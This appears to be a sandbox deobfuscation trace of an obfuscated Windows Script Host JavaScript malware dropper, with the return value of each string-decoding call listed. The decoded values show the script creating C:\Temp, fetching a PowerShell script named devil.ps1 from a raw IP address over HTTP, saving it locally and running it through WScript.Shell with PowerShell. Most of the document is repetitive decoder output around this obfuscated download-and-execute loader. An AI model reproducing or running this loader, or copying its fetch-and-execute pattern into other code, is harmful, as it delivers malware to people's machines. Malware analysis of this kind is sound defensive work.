                                                                                                              • a() ➔ iCoHWQ95euBdJSkIhmoIxSoo,s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU
                                                                                                              • Show all Function Runs
                                                                                                              30
                                                                                                              while (! ! [ ] )
                                                                                                                31
                                                                                                                {
                                                                                                                  32
                                                                                                                  try
                                                                                                                    33
                                                                                                                    {
                                                                                                                      34
                                                                                                                      var g = - parseInt ( i ( 0x204 ) ) / 0x1 * ( parseInt ( i ( 0x1f1 ) ) / 0x2 ) + - parseInt ( j ( 0x208, '!fnS' ) ) / 0x3 * ( - parseInt ( i ( 0x201 ) ) / 0x4 ) + - parseInt ( j ( 0x200, 'xtav' ) ) / 0x5 * ( - parseInt ( j ( 0x212, 'Rs1)' ) ) / 0x6 ) + - parseInt ( i ( 0x1f4 ) ) / 0x7 * ( parseInt ( j ( 0x20c, 'Ggh6' ) ) / 0x8 ) + - parseInt ( i ( 0x20f ) ) / 0x9 + parseInt ( j ( 0x20b, 'wBd[' ) ) / 0xa + - parseInt ( j ( 0x1ef, 'AqLr' ) ) / 0xb;
                                                                                                                      • c(516) ➔ "\x15Pi\xdd}wH;\xfd\xc5\x1c\xcc"
                                                                                                                      • parseInt("\x15Pi\xdd}wH;\xfd\xc5\x1c\xcc") ➔ NaN
                                                                                                                      • c(497) ➔ "\xa4H\xfbww\xdc%:\x03\x96&\x03\xb2"
                                                                                                                      • parseInt("\xa4H\xfbww\xdc%:\x03\x96&\x03\xb2") ➔ NaN
                                                                                                                      • b(520,"!fnS") ➔ ">\xbe j\x9c\xb7\xdb\x07-ld\x91\"
                                                                                                                      • parseInt(">\xbe j\x9c\xb7\xdb\x07-ld\x91\") ➔ NaN
                                                                                                                      • c(513) ➔ "\xd6\xbe\xaewO $\x06\xc1^\xac(\xa85\x8d\xea\x95\x0e}|\xf1\x03\xdc5^\xb7"
                                                                                                                      • parseInt("\xd6\xbe\xaewO $\x06\xc1^\xac(\xa85\x8d\xea\x95\x0e}|\xf1\x03\xdc5^\xb7") ➔ NaN
                                                                                                                      • b(512,"xtav") ➔ "O\xaa6AmZ"
                                                                                                                      • parseInt("O\xaa6AmZ") ➔ NaN
                                                                                                                      • b(530,"Rs1)") ➔ "\xb4\x02\x87 '"
                                                                                                                      • parseInt("\xb4\x02\x87 '") ➔ NaN
                                                                                                                      • c(500) ➔ "4xOyvhS"
                                                                                                                      • parseInt("4xOyvhS") ➔ 4
                                                                                                                      • b(524,"Ggh6") ➔ "\xf9\x94\xce+K'\xd50\x07\x8f\x84\xb6\xb1"
                                                                                                                      • parseInt("\xf9\x94\xce+K'\xd50\x07\x8f\x84\xb6\xb1") ➔ NaN
                                                                                                                      • c(527) ➔ "Run"
                                                                                                                      • parseInt("Run") ➔ NaN
                                                                                                                      • b(523,"wBd[") ➔ "\x02VF\xf7\x0b\xd4\xd8\xee\x94w3"
                                                                                                                      • parseInt("\x02VF\xf7\x0b\xd4\xd8\xee\x94w3") ➔ NaN
                                                                                                                      • b(495,"AqLr") ➔ ",\x00\xe7\\xa0\x16p\x84x\x19\xbc\xfc"
                                                                                                                      • parseInt(",\x00\xe7\\xa0\x16p\x84x\x19\xbc\xfc") ➔ NaN
                                                                                                                      • c(516) ➔ "\xdd)\xbe\xd7\xe0~\xa0 \xe1*"
                                                                                                                      • parseInt("\xdd)\xbe\xd7\xe0~\xa0 \xe1*") ➔ NaN
                                                                                                                      • c(497) ➔ "\xbd\xcb\x8b\xe1\x90"
                                                                                                                      • parseInt("\xbd\xcb\x8b\xe1\x90") ➔ NaN
                                                                                                                      • b(520,"!fnS") ➔ "V\x80\xda\xe7u\xa1K"
                                                                                                                      • parseInt("V\x80\xda\xe7u\xa1K") ➔ NaN
                                                                                                                      • c(513) ➔ "5144112GbDKJt"
                                                                                                                      • parseInt("5144112GbDKJt") ➔ 5144112
                                                                                                                      • b(512,"xtav") ➔ "{%\xe2r:\x8c\xdci\xe9U\xc0\xca"\x86\x8a\x1741&\xb5\xe5\xf4\x0ci:\x9e"
                                                                                                                      • parseInt("{%\xe2r:\x8c\xdci\xe9U\xc0\xca"\x86\x8a\x1741&\xb5\xe5\xf4\x0ci:\x9e") ➔ NaN
                                                                                                                      • b(530,"Rs1)") ➔ "\xd8J\xfa\xeen\xb2\xc1\x0e\xa0\x81U"
                                                                                                                      • parseInt("\xd8J\xfa\xeen\xb2\xc1\x0e\xa0\x81U") ➔ NaN
                                                                                                                      • c(500) ➔ "Status"
                                                                                                                      • parseInt("Status") ➔ NaN
                                                                                                                      • b(524,"Ggh6") ➔ "\xc3\x10\xb1\xa5\x12\xda^\x0ft/G"
                                                                                                                      • parseInt("\xc3\x10\xb1\xa5\x12\xda^\x0ft/G") ➔ NaN
                                                                                                                      • c(527) ➔ "\xb4\xfaR\x14\xecO0\xcf\xa5 \xa6\x9fBZ\xf5\x99\xaeoG\xaf\x89\x8bZ\x8f\x8b\xd8"
                                                                                                                      • parseInt("\xb4\xfaR\x14\xecO0\xcf\xa5 \xa6\x9fBZ\xf5\x99\xaeoG\xaf\x89\x8bZ\x8f\x8b\xd8") ➔ NaN
                                                                                                                      • j(523,"wBd[") ➔ "\xbd\x07\xe7dko\x19\x88s\xa7<\xc7>"
                                                                                                                      • parseInt("\xbd\x07\xe7dko\x19\x88s\xa7<\xc7>") ➔ NaN
                                                                                                                      • j(495,"AqLr") ➔ "R\x7f\xc6\xcd\x890\x04\x87\xe7\x93"
                                                                                                                      • parseInt("R\x7f\xc6\xcd\x890\x04\x87\xe7\x93") ➔ NaN
                                                                                                                      • i(516) ➔ "WScript.Shell"
                                                                                                                      • parseInt("WScript.Shell") ➔ NaN
                                                                                                                      • i(497) ➔ "\x9c\xa2z1@\xdd\xae\x19}D\x00"
                                                                                                                      • parseInt("\x9c\xa2z1@\xdd\xae\x19}D\x00") ➔ NaN
                                                                                                                      • j(520,"!fnS") ➔ "[\xe2\xc9To\xb2pq"
                                                                                                                      • parseInt("[\xe2\xc9To\xb2pq") ➔ NaN
                                                                                                                      • i(513) ➔ "\xde\xc1\xad\xec\x83\xde\xcf"
                                                                                                                      • parseInt("\xde\xc1\xad\xec\x83\xde\xcf") ➔ NaN
                                                                                                                      • j(512,"xtav") ➔ "\x98\xaax1D\xb4\xca(JO'\xa8\xfe"
                                                                                                                      • parseInt("\x98\xaax1D\xb4\xca(JO'\xa8\xfe") ➔ NaN
                                                                                                                      • j(530,"Rs1)") ➔ "\xcd\xf8(\x9c\xbdv\x1f\xd7\xbc\xa1\xa5\xe9"
                                                                                                                      • parseInt("\xcd\xf8(\x9c\xbdv\x1f\xd7\xbc\xa1\xa5\xe9") ➔ NaN
                                                                                                                      • i(500) ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
                                                                                                                      • parseInt("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ") ➔ NaN
                                                                                                                      • j(524,"Ggh6") ➔ "\xe5\x82\xeb\xd6"
                                                                                                                      • parseInt("\xe5\x82\xeb\xd6") ➔ NaN
                                                                                                                      • i(527) ➔ "8b\xb9s\x9b\xc2\xb6c\xca;\x85\xfc\x15S"
                                                                                                                      • parseInt("8b\xb9s\x9b\xc2\xb6c\xca;\x85\xfc\x15S") ➔ 8
                                                                                                                      • j(523,"wBd[") ➔ "\x87\x83\x98\xea2\x92\x92\xb7\x00\x07\xff"
                                                                                                                      • parseInt("\x87\x83\x98\xea2\x92\x92\xb7\x00\x07\xff") ➔ NaN
                                                                                                                      • j(495,"AqLr") ➔ "\xc3\x1dN \xd1\x98\xe8_\xd7NJw\x83"
                                                                                                                      • parseInt("\xc3\x1dN \xd1\x98\xe8_\xd7NJw\x83") ➔ NaN
                                                                                                                      • i(516) ➔ "http://176.65.144.3/dev/devil.ps1"
                                                                                                                      • parseInt("http://176.65.144.3/dev/devil.ps1") ➔ NaN
                                                                                                                      • i(497) ➔ "4xOyvhS"
                                                                                                                      • parseInt("4xOyvhS") ➔ 4
                                                                                                                      • j(520,"!fnS") ➔ "\xdc>F\x07\x06\xe68\x17]\xcf\xde"
                                                                                                                      • parseInt("\xdc>F\x07\x06\xe68\x17]\xcf\xde") ➔ NaN
                                                                                                                      • i(513) ➔ "\x15Pi\xdd}wH;\xfd\xc5\x1c\xcc"
                                                                                                                      • parseInt("\x15Pi\xdd}wH;\xfd\xc5\x1c\xcc") ➔ NaN
                                                                                                                      • j(512,"xtav") ➔ "sZ\xe1\xe9\xf6[7"
                                                                                                                      • parseInt("sZ\xe1\xe9\xf6[7") ➔ NaN
                                                                                                                      • j(530,"Rs1)") ➔ "\xa7L\xd5\xc7\xaabl\x94\x0c\x82+\xaf"
                                                                                                                      • parseInt("\xa7L\xd5\xc7\xaabl\x94\x0c\x82+\xaf") ➔ NaN
                                                                                                                      • i(500) ➔ "4821KyPiOB"
                                                                                                                      • parseInt("4821KyPiOB") ➔ 4821
                                                                                                                      • j(524,"Ggh6") ➔ "\xa0T\xeb"
                                                                                                                      • parseInt("\xa0T\xeb") ➔ NaN
                                                                                                                      • i(527) ➔ "X\x1b\x00\xef\x8b"
                                                                                                                      • parseInt("X\x1b\x00\xef\x8b") ➔ NaN
                                                                                                                      • j(523,"wBd[") ➔ "\xa1\x11\xc2\x99"
                                                                                                                      • parseInt("\xa1\x11\xc2\x99") ➔ NaN
                                                                                                                      • j(495,"AqLr") ➔ "\xda\x9e>\x9f6"
                                                                                                                      • parseInt("\xda\x9e>\x9f6") ➔ NaN
                                                                                                                      • i(516) ➔ "Vd\x8cG\x90t\xf8\x0e\x83\x9c<\x1bG"
                                                                                                                      • parseInt("Vd\x8cG\x90t\xf8\x0e\x83\x9c<\x1bG") ➔ NaN
                                                                                                                      • i(497) ➔ "Status"
                                                                                                                      • parseInt("Status") ➔ NaN
                                                                                                                      • j(520,"!fnS") ➔ "co\xe7\x94f]\xf9q\xba\x1f\xd1G\x07"
                                                                                                                      • parseInt("co\xe7\x94f]\xf9q\xba\x1f\xd1G\x07") ➔ NaN
                                                                                                                      • i(513) ➔ "\xdd)\xbe\xd7\xe0~\xa0 \xe1*"
                                                                                                                      • parseInt("\xdd)\xbe\xd7\xe0~\xa0 \xe1*") ➔ NaN
                                                                                                                      • j(512,"xtav") ➔ "\xb8\xcb%\xd8\x08\xf2\xb0T\xd5\xcep."
                                                                                                                      • parseInt("\xb8\xcb%\xd8\x08\xf2\xb0T\xd5\xcep.") ➔ NaN
                                                                                                                      • j(530,"Rs1)") ➔ "\xd93\xf4V\x83D\x18\x97\x93\x08"
                                                                                                                      • parseInt("\xd93\xf4V\x83D\x18\x97\x93\x08") ➔ NaN
                                                                                                                      • i(500) ➔ "C:\Temp\WTRTRWFSHS.ps1"
                                                                                                                      • parseInt("C:\Temp\WTRTRWFSHS.ps1") ➔ NaN
                                                                                                                      • j(524,"Ggh6") ➔ "F\xdb\xd7\x86\xcd\xf6?\x87\xb6i\xab\xe4\xef\xc9\x90\x17Z\xea\x8dLG\xde\xb89\xde\xd3"
                                                                                                                      • parseInt("F\xdb\xd7\x86\xcd\xf6?\x87\xb6i\xab\xe4\xef\xc9\x90\x17Z\xea\x8dLG\xde\xb89\xde\xd3") ➔ NaN
                                                                                                                      • i(527) ➔ "4S}\x0b\xc2\x82\x10{\x00\xc2\xae"
                                                                                                                      • parseInt("4S}\x0b\xc2\x82\x10{\x00\xc2\xae") ➔ 4
                                                                                                                      • j(523,"wBd[") ➔ "\xe4\xc7\xc2"
                                                                                                                      • parseInt("\xe4\xc7\xc2") ➔ NaN
                                                                                                                      • j(495,"AqLr") ➔ "\xfb\xf7\xcfO\xe6\x99c|\xa9\x9cl"
                                                                                                                      • parseInt("\xfb\xf7\xcfO\xe6\x99c|\xa9\x9cl") ➔ NaN
                                                                                                                      • i(516) ➔ ">Zv\xcaybh"
                                                                                                                      • parseInt(">Zv\xcaybh") ➔ NaN
                                                                                                                      • i(497) ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
                                                                                                                      • parseInt("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ") ➔ NaN
                                                                                                                      • j(520,"!fnS") ➔ "Y\xeb\x98\x1a?\xa0rN\xc9\xbf\x12"
                                                                                                                      • parseInt("Y\xeb\x98\x1a?\xa0rN\xc9\xbf\x12") ➔ NaN
                                                                                                                      • i(513) ➔ "WScript.Shell"
                                                                                                                      • parseInt("WScript.Shell") ➔ NaN
                                                                                                                      • j(512,"xtav") ➔ "p\xb2\xf2\xd2\x95\xfbXO\xc9!"
                                                                                                                      • parseInt("p\xb2\xf2\xd2\x95\xfbXO\xc9!") ➔ NaN
                                                                                                                      • j(530,"Rs1)") ➔ "HQ|\x92\xdb\xec\xf4O\xa3\xd5\xdd$d"
                                                                                                                      • parseInt("HQ|\x92\xdb\xec\xf4O\xa3\xd5\xdd$d") ➔ NaN
                                                                                                                      • i(500) ➔ "CreateObject"
                                                                                                                      • parseInt("CreateObject") ➔ NaN
                                                                                                                      • j(524,"Ggh6") ➔ "\xcaC<\xe1\xba{\xb9+\xd9[\x88\x87\xb8\xc0"
                                                                                                                      • parseInt("\xcaC<\xe1\xba{\xb9+\xd9[\x88\x87\xb8\xc0") ➔ NaN
                                                                                                                      • i(527) ➔ "!\xe1\xafy\x11F\xce\xa2\x1c\xe2^\xce"
                                                                                                                      • parseInt("!\xe1\xafy\x11F\xce\xa2\x1c\xe2^\xce") ➔ NaN
                                                                                                                      • j(523,"wBd[") ➔ "\x02H\xfe\xc9\xed\xbe\xf3?\xc2A\x13\x95`\xf9`\x16\xaf\x9d\xdc2\xaeG\x00\xca\xa2\xc8"
                                                                                                                      • parseInt("\x02H\xfe\xc9\xed\xbe\xf3?\xc2A\x13\x95`\xf9`\x16\xaf\x9d\xdc2\xaeG\x00\xca\xa2\xc8") ➔ NaN
                                                                                                                      • j(495,"AqLr") ➔ "S-\xfa\x07\xd0,\x9e"
                                                                                                                      • parseInt("S-\xfa\x07\xd0,\x9e") ➔ NaN
                                                                                                                      • i(516) ➔ "38eycqSx"
                                                                                                                      • parseInt("38eycqSx") ➔ 38
                                                                                                                      • i(497) ➔ "4821KyPiOB"
                                                                                                                      • parseInt("4821KyPiOB") ➔ 4821
                                                                                                                      • j(520,"!fnS") ➔ "\x7fy\xc2i"
                                                                                                                      • parseInt("\x7fy\xc2i") ➔ NaN
                                                                                                                      • i(513) ➔ "http://176.65.144.3/dev/devil.ps1"
                                                                                                                      • parseInt("http://176.65.144.3/dev/devil.ps1") ➔ NaN
                                                                                                                      • j(512,"xtav") ➔ "\xfa\xc8/w\x1c\xf5\x8cA{c \x8e\xe6"
                                                                                                                      • parseInt("\xfa\xc8/w\x1c\xf5\x8cA{c \x8e\xe6") ➔ NaN
                                                                                                                      • j(530,"Rs1)") ➔ "Q\xd2\x0c\x04<"
                                                                                                                      • parseInt("Q\xd2\x0c\x04<") ➔ NaN
                                                                                                                      • i(500) ➔ "\xdd\xed\xf0V"
                                                                                                                      • parseInt("\xdd\xed\xf0V") ➔ NaN
                                                                                                                      • j(524,"Ggh6") ➔ "\xaa:\x85}\xaa"
                                                                                                                      • parseInt("\xaa:\x85}\xaa") ➔ NaN
                                                                                                                      • i(527) ➔ "KUR"\x06R\xbd\xe1\xac\xc1\xd0\x88"
                                                                                                                      • parseInt("KUR"\x06R\xbd\xe1\xac\xc1\xd0\x88") ➔ NaN
                                                                                                                      • j(523,"wBd[") ➔ "\x8e\xd0\x15\xae\x9a3u\x93\xads0\xf67\xf0"
                                                                                                                      • parseInt("\x8e\xd0\x15\xae\x9a3u\x93\xads0\xf67\xf0") ➔ NaN
                                                                                                                      • j(495,"AqLr") ➔ "4!\xd4 \xd37"
                                                                                                                      • parseInt("4!\xd4 \xd37") ➔ 4
                                                                                                                      • i(516) ➔ "\xb4\xe4\xea* %\x1b\x1e\xf3?\x86"
                                                                                                                      • parseInt("\xb4\xe4\xea* %\x1b\x1e\xf3?\x86") ➔ NaN
                                                                                                                      • i(497) ➔ "C:\Temp\WTRTRWFSHS.ps1"
                                                                                                                      • parseInt("C:\Temp\WTRTRWFSHS.ps1") ➔ NaN
                                                                                                                      • j(520,"!fnS") ➔ ":\xaf\xc2"
                                                                                                                      • parseInt(":\xaf\xc2") ➔ NaN
                                                                                                                      • i(513) ➔ "Vd\x8cG\x90t\xf8\x0e\x83\x9c<\x1bG"
                                                                                                                      • parseInt("Vd\x8cG\x90t\xf8\x0e\x83\x9c<\x1bG") ➔ NaN
                                                                                                                      • j(512,"xtav") ➔ "\xc5\xef8uO\xaa\xd7^\x1f=B\xd4\xbf\x9d6\xc9\x95\x11h\xe6p\x92\xa6s\x00L\xdbDn\xdaD\x11x"
                                                                                                                      • parseInt("\xc5\xef8uO\xaa\xd7^\x1f=B\xd4\xbf\x9d6\xc9\x95\x11h\xe6p\x92\xa6s\x00L\xdbDn\xdaD\x11x") ➔ NaN
                                                                                                                      • j(530,"Rs1)") ➔ "p\xbb\xfd\xd4\xec\xed\x7fl\xdd\x07\xfb"
                                                                                                                      • parseInt("p\xbb\xfd\xd4\xec\xed\x7fl\xdd\x07\xfb") ➔ NaN
                                                                                                                      • i(500) ➔ "Y\xe2\x9f\x195\xf1\x10z\xff\xb4\x01\xdbb"
                                                                                                                      • parseInt("Y\xe2\x9f\x195\xf1\x10z\xff\xb4\x01\xdbb") ➔ NaN
                                                                                                                      • j(524,"Ggh6") ➔ "\xc6r\xf8\x99\xe3;\x1f3\x13\xa2\xa3"
                                                                                                                      • parseInt("\xc6r\xf8\x99\xe3;\x1f3\x13\xa2\xa3") ➔ NaN
                                                                                                                      • i(527) ➔ "5*s\xb3/t\xc9\xe23K"
                                                                                                                      • parseInt("5*s\xb3/t\xc9\xe23K") ➔ 5
                                                                                                                      • j(523,"wBd[") ➔ "\xee\xa9\xac2\x8a"
                                                                                                                      • parseInt("\xee\xa9\xac2\x8a") ➔ NaN
                                                                                                                      • j(495,"AqLr") ➔ "7:\xc2\x1b\xd4\x17\xa5\x00\xb8\xb4LY\x7f.5\x9d\x8f\xe9\xf3\x19\x1e!I\x89~\x87\xbe\x05\x13\xdd2\xaf\xf53\xc8\xbc<\xb0\x91R\x0f \xd04Ak\x0b\x8e\xdbw\xff~\xa6j\x19\xfe@\xf7"
                                                                                                                      • parseInt("7:\xc2\x1b\xd4\x17\xa5\x00\xb8\xb4LY\x7f.5\x9d\x8f\xe9\xf3\x19\x1e!I\x89~\x87\xbe\x05\x13\xdd2\xaf\xf53\xc8\xbc<\xb0\x91R\x0f \xd04Ak\x0b\x8e\xdbw\xff~\xa6j\x19\xfe@\xf7") ➔ 7
                                                                                                                      • i(516) ➔ "\x0b\xb5K\xb9j\x9e\xdax\x14\xef\x89\xcd\x1c"
                                                                                                                      • parseInt("\x0b\xb5K\xb9j\x9e\xdax\x14\xef\x89\xcd\x1c") ➔ NaN
                                                                                                                      • i(497) ➔ "CreateObject"
                                                                                                                      • parseInt("CreateObject") ➔ NaN
                                                                                                                      • j(520,"!fnS") ➔ "\xdc \xfe9\xe0\x8c\x13\xc6\x0b\xf9\xfe\x15Y\x1bw\x8b\x8e\x98@<\x0e\xcc UcV"
                                                                                                                      • parseInt("\xdc \xfe9\xe0\x8c\x13\xc6\x0b\xf9\xfe\x15Y\x1bw\x8b\x8e\x98@<\x0e\xcc UcV") ➔ NaN
                                                                                                                      • i(513) ➔ ">Zv\xcaybh"
                                                                                                                      • parseInt(">Zv\xcaybh") ➔ NaN
                                                                                                                      • j(512,"xtav") ➔ "\xfb\xff\xc0B\xe5\xf1\x00a\xab\x97P\xf9\xcd"
                                                                                                                      • parseInt("\xfb\xff\xc0B\xe5\xf1\x00a\xab\x97P\xf9\xcd") ➔ NaN
                                                                                                                      • j(530,"Rs1)") ➔ "\xd8a\xc8\x9c\xdaX\x82"
                                                                                                                      • parseInt("\xd8a\xc8\x9c\xdaX\x82") ➔ NaN
                                                                                                                      • i(500) ➔ "Failed to execute PowerShell script: "
                                                                                                                      • parseInt("Failed to execute PowerShell script: ") ➔ NaN
                                                                                                                      • j(524,"Ggh6") ➔ "\xd3\xc0*\xeb0\xff\xc1\xea\x0f\x82S\xb5"
                                                                                                                      • parseInt("\xd3\xc0*\xeb0\xff\xc1\xea\x0f\x82S\xb5") ➔ NaN
                                                                                                                      • i(527) ➔ "\xa4H\xfbww\xdc%:\x03\x96&\x03\xb2"
                                                                                                                      • parseInt("\xa4H\xfbww\xdc%:\x03\x96&\x03\xb2") ➔ NaN
                                                                                                                      • j(523,"wBd[") ➔ "\x82\xe1\xd1\xd6\xc3s\xd3\x8bg\x8a\x1b"
                                                                                                                      • parseInt("\x82\xe1\xd1\xd6\xc3s\xd3\x8bg\x8a\x1b") ➔ NaN
                                                                                                                      • j(495,"AqLr") ➔ "Sm\x87O\xed=\x9d\x0c\x9b\x9a"
                                                                                                                      • parseInt("Sm\x87O\xed=\x9d\x0c\x9b\x9a") ➔ NaN
                                                                                                                      • i(516) ➔ "11473cQGgOJ"
                                                                                                                      • parseInt("11473cQGgOJ") ➔ 11473
                                                                                                                      • i(497) ➔ "\xdd\xed\xf0V"
                                                                                                                      • parseInt("\xdd\xed\xf0V") ➔ NaN
                                                                                                                      • j(520,"!fnS") ➔ "P\xb8\x15^\x97\x01\x95jd\xcb\xddv\x0e\x12"
                                                                                                                      • parseInt("P\xb8\x15^\x97\x01\x95jd\xcb\xddv\x0e\x12") ➔ NaN
                                                                                                                      • i(513) ➔ "38eycqSx"
                                                                                                                      • parseInt("38eycqSx") ➔ 38
                                                                                                                      • j(512,"xtav") ➔ "\x93\xc1:\xcf\x0c\xe7\x90"
                                                                                                                      • parseInt("\x93\xc1:\xcf\x0c\xe7\x90") ➔ NaN
                                                                                                                      • j(530,"Rs1)") ➔ "\xbfm\xe6\x91\xd9C"
                                                                                                                      • parseInt("\xbfm\xe6\x91\xd9C") ➔ NaN
                                                                                                                      • i(500) ➔ "\x06\xf5\xcc"
                                                                                                                      • parseInt("\x06\xf5\xcc") ➔ NaN
                                                                                                                      • j(524,"Ggh6") ➔ "\xb9t\xd7\xb0'\xeb\xb2\xa9\xbf\xa1\xdd\xf3"
                                                                                                                      • parseInt("\xb9t\xd7\xb0'\xeb\xb2\xa9\xbf\xa1\xdd\xf3") ➔ NaN
                                                                                                                      • i(527) ➔ "\xbd\xcb\x8b\xe1\x90"
                                                                                                                      • parseInt("\xbd\xcb\x8b\xe1\x90") ➔ NaN
                                                                                                                      • j(523,"wBd[") ➔ "\x97S\x03\xa4\x10\xb7 R{\xaa\xeb\xc4"
                                                                                                                      • parseInt("\x97S\x03\xa4\x10\xb7 R{\xaa\xeb\xc4") ➔ NaN
                                                                                                                      • j(495,"AqLr") ➔ "$o\xe9*\xc3)\xbd9\x83\x8c> c\x16#\xbc\xa8\xdc\xb4\x05\x080"
                                                                                                                      • parseInt("$o\xe9*\xc3)\xbd9\x83\x8c> c\x16#\xbc\xa8\xdc\xb4\x05\x080") ➔ NaN
                                                                                                                      • Show all Function Runs
                                                                                                                      35
                                                                                                                      if ( g === e )
                                                                                                                        36
                                                                                                                        break ;
                                                                                                                          37
                                                                                                                          else
                                                                                                                            38
                                                                                                                            f['push'] ( f['shift'] ( ) );
                                                                                                                              39
                                                                                                                              }
                                                                                                                                40
                                                                                                                                catch ( h )
                                                                                                                                  41
                                                                                                                                  {
                                                                                                                                    42
                                                                                                                                    f['push'] ( f['shift'] ( ) );
                                                                                                                                      43
                                                                                                                                      }
                                                                                                                                        44
                                                                                                                                        }
                                                                                                                                          45
                                                                                                                                          } ( a, 0x7acbc ) );
                                                                                                                                            46
                                                                                                                                            var URL = k ( 0x1ee ), DownloadPath = k ( 0x205 ), TEMP_DIR = 'C:\x5cTemp', SUCCESS_STATUS = 0xc8, POWERSHELL_CMD = k ( 0x203 ), shell = WScript[k ( 0x206 ) ] ( k ( 0x213 ) ), fileSystem = WScript['CreateObject'] ( l ( 0x20e, 'qaek' ) ), http = WScript['CreateObject'] ( 'MSXML2.XMLHTTP' );
                                                                                                                                            • k(494) ➔ "http://176.65.144.3/dev/devil.ps1"
                                                                                                                                            • k(517) ➔ "C:\Temp\WTRTRWFSHS.ps1"
                                                                                                                                            • k(515) ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
                                                                                                                                            • k(518) ➔ "CreateObject"
                                                                                                                                            • k(531) ➔ "WScript.Shell"
                                                                                                                                            • Windows Script Host.CreateObject("WScript.Shell") ➔
                                                                                                                                            • l(526,"qaek") ➔ "Scripting.FileSystemObject"
                                                                                                                                            • Windows Script Host.CreateObject("Scripting.FileSystemObject") ➔
                                                                                                                                            • Windows Script Host.CreateObject("MSXML2.XMLHTTP") ➔
                                                                                                                                            • Show all Function Runs
                                                                                                                                            47
                                                                                                                                            ! fileSystem[l ( 0x211, 'Sp)8' ) ] ( TEMP_DIR ) && fileSystem[l ( 0x1fb, '0C0E' ) ] ( TEMP_DIR );
                                                                                                                                            • l(529,"Sp)8") ➔ "FolderExists"
                                                                                                                                            • FolderExists("C:\Temp") ➔ false
                                                                                                                                            • l(507,"0C0E") ➔ "CreateFolder"
                                                                                                                                            • CreateFolder("C:\Temp") ➔ C:\Temp
                                                                                                                                            • Show all Function Runs
                                                                                                                                            48
                                                                                                                                            function b(c, d) {
                                                                                                                                            • b(520,"!fnS") ➔ ">\xbe j\x9c\xb7\xdb\x07-ld\x91\"
                                                                                                                                            • b(512,"xtav") ➔ "O\xaa6AmZ"
                                                                                                                                            • b(530,"Rs1)") ➔ "\xb4\x02\x87 '"
                                                                                                                                            • b(524,"Ggh6") ➔ "\xf9\x94\xce+K'\xd50\x07\x8f\x84\xb6\xb1"
                                                                                                                                            • b(523,"wBd[") ➔ "\x02VF\xf7\x0b\xd4\xd8\xee\x94w3"
                                                                                                                                            • b(495,"AqLr") ➔ ",\x00\xe7\\xa0\x16p\x84x\x19\xbc\xfc"
                                                                                                                                            • b(520,"!fnS") ➔ "V\x80\xda\xe7u\xa1K"
                                                                                                                                            • b(512,"xtav") ➔ "{%\xe2r:\x8c\xdci\xe9U\xc0\xca"\x86\x8a\x1741&\xb5\xe5\xf4\x0ci:\x9e"
                                                                                                                                            • b(530,"Rs1)") ➔ "\xd8J\xfa\xeen\xb2\xc1\x0e\xa0\x81U"
                                                                                                                                            • b(524,"Ggh6") ➔ "\xc3\x10\xb1\xa5\x12\xda^\x0ft/G"
                                                                                                                                            • Show all Function Runs
                                                                                                                                            49
                                                                                                                                            var e = a ( );
                                                                                                                                            • a() ➔ iCoHWQ95euBdJSkIhmoIxSoo,s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU
